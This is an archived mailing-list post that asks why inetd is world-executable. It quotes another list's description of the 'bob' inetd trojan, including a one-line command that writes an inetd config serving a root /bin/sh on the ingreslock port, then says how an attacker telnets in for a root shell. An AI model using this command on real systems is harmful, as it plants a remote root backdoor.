[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Why a+x inetd permissions?
Why is inetd world-executable by default?
Is there any legitamite reason for anyone other than root to run it?
Or, if it's run by "nobody" or some such, the owner could be changed
to that user...
I read this on another list, a response to someone asking about some
ports he's not filtering:
> If so, you may suffer from inetd "trojan" such as bob exploit.
> It works like this on statd buffer overflow:
> echo "ingreslock stream tcp nowait root /bin/sh sh -c" >/tmp/bob; inetd /tmp/bob
> then 'telnet victim ingreslock' would give the attacker root shell. (My memory
> may not be sufficiently good. See comp.security.unix archive around last
rick -- A mind is like a parachute...it only works when it's open.
My opinions don't exist, and as such, are not anyone elses. I do not
represent anyone, not even myself, and especially not my employer.
Looking for a 68 Camaro, details at http://dingo.mcrnet.net
ICQ# 1590117 email@example.com (work) firstname.lastname@example.org (home)